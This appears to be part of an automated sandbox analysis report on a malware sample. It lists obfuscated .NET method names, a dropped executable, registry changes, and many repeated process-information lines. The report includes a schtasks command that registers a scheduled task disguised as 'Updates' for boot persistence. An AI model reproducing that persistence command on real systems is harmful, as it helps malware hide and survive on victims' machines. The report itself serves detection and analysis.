Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, Ar0ZDZ6hqqFCb9tOPE.cs	High entropy of concatenated method names: 'XtH5Xt1dsK', 'pn65Wu0rMP', 'roO5RmhXII', 'Xqm5IZd8X4', 'bdK5yy6Qhq', 'kUh5LaUqjY', 'WKY1Qp4Z8fdqwcZ4ri', 'KNK9E6Bd27TgPnLq9j', 'BlT55Kff4U', 'So45VfspTM'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, st1dsKfLn6u0rMPrYT.cs	High entropy of concatenated method names: 'I3Kdw3g150', 'uexd7mliXD', 'whSdgJ1oAp', 'DQSd2cT6O6', 'AQNdSpj4fS', 'CYIdt11qX7', 'HVOdmyR3PA', 'WCpd1EQFFS', 'NZNdPp9t1q', 'wSfdnoB3b5'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, oAl2Hsksxhxi2EQuvF.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm7upPowGcr', 'SYhpntuoc4', 'iqipz9SZQq', 'kToVa6QNZn', 'cZAV5WFplw', 'B7NVpbHNLy', 'a76VVj3UBp', 'dE7jdXM7bZgLD7bGaR5'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, ekkkRe5aIZpAd5pcdRK.cs	High entropy of concatenated method names: 'X8H0KPh6n4', 'Uri0E2Z2xj', 'JjE0QnxtH3', 'Bqq0vDVyG0', 'Ef50ihh1ZS', 'MaK0x21pQZ', 'fgj0FB5Y2e', 'h5c0fiSvG5', 'D4C0U03BYl', 'Aug0eF1otW'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, Qvw5fqTaMwD3qUIH41.cs	High entropy of concatenated method names: 'QmgXC0Stte', 'ojAXk9hbcs', 'mIjXGHoyFc', 'aJkGnWLQQG', 'aFqGzD8rQX', 'HJeXaLxlx1', 'ea0X58dTob', 'rj4XpI2DTK', 'SAPXVYPYn3', 'svPX6WSS3E'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, skeHuy1OknjT7QIR5Y.cs	High entropy of concatenated method names: 'GrXBCYRIOc', 'bJYBdHg5MK', 'KSWBkGoTQW', 'BdlBqYbqdr', 'CFLBGxN0gY', 'q9eBX7sOI7', 'WplBWtrqR3', 'n5MBMZqYV1', 'nHDBRiP0e9', 'yvcBIoeZH4'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, FSJ5wAg9wfpjNbAye6.cs	High entropy of concatenated method names: 'ToString', 'spcLAmqiqK', 'DmcLbNf3tP', 'PBdLOlFOkv', 'GCTLswWEUn', 'wJOL45S6aZ', 'uS6LlPOK11', 'ds6LTN9LwR', 'jn4LofsUll', 'piHLJo1lpZ'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, lbGCkp5Vtsla7QGfDKN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PZRHwnYtNy', 'w4IH7FSqR3', 'qW1HgKTwuW', 'ryKH2hDybW', 'Hq4HSoPUva', 'x1QHtO0Ncs', 'SrSHmAOMMF'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, w3EmhdtvZnNN1x7nyF.cs	High entropy of concatenated method names: 'WkDc1uLJgc', 'D1UcnacmU7', 'TOEBaqcGJb', 'dxdB5fQgFc', 'h9vcAEWirC', 'wVDcr2PLsT', 'oAJcu2uc66', 'LY0cwNOY4D', 'QNZc7SBA5b', 'CTycgvaonE'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, KIEnU8WvlckDlH11VR.cs	High entropy of concatenated method names: 'SRxVNVrHlT', 'peRVCPk3Wl', 'lPbVdXmFn2', 'tqTVkPwCVo', 'oBGVqNUlo6', 'bR8VGVXSXD', 'CPXVXyAnek', 'UWpVWjpeMA', 'f1YVM6gqg9', 'XHmVRYALue'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, IWRIt7dVO6ncMTHeUD.cs	High entropy of concatenated method names: 'Dispose', 'Tyf5PUNq7a', 'qCjpb2JBH5', 'H2VaaPf3UT', 'AHk5neHuyO', 'hnj5zT7QIR', 'ProcessDialogKey', 'bY3paSJ6Gs', 'xxQp50NQir', 'miapp0nRUh'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, Ujy13luVt5WqpjICm0.cs	High entropy of concatenated method names: 'sdM9flVgIF', 'rGG9UhdtQg', 'xWs9jKRETn', 'Suy9bOxO7w', 'Emj9sg51A9', 'q3j94OKQb4', 'DZ59TGyCat', 'HaG9oioJiP', 'JZO98Hjugl', 'IpP9Al8ssc'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, snRUh1niwQbHI6M83f.cs	High entropy of concatenated method names: 'IPi051uMRM', 'DXk0VEGfOA', 'tgZ06uEMGr', 'kJ10CenKXy', 'NFv0dsPFuL', 'ByD0qOniSH', 'sSD0GZ3YpW', 'qArBmoExny', 'PSNB1Kv8sQ', 'pMCBP2QZ8X'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, xSHtdkwgAmsVjQEvL2.cs	High entropy of concatenated method names: 'DiFy8OgaDD', 'beeyrGufcw', 'gW9ywWJ2Xs', 'Dcky7X8ARo', 'KvdybBm3et', 'vOhyOfTPwI', 'AvtysaNuE5', 'S0yy4CX3QP', 'l0vyli1GvU', 'dvHyTZNj2d'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, eUYxAsz7f1gqDsK0ZX.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i5N09msF41', 'N7c0yi1WaF', 'PmX0LoqPmc', 'ekR0cJMyer', 'ovB0BhXKIe', 'JTI00NTL71', 'xJy0HY7bKa'

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AFE5D244A8D1194230FF479FE2F897BBCD7A8CB4 Blob

Jump to behavior

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
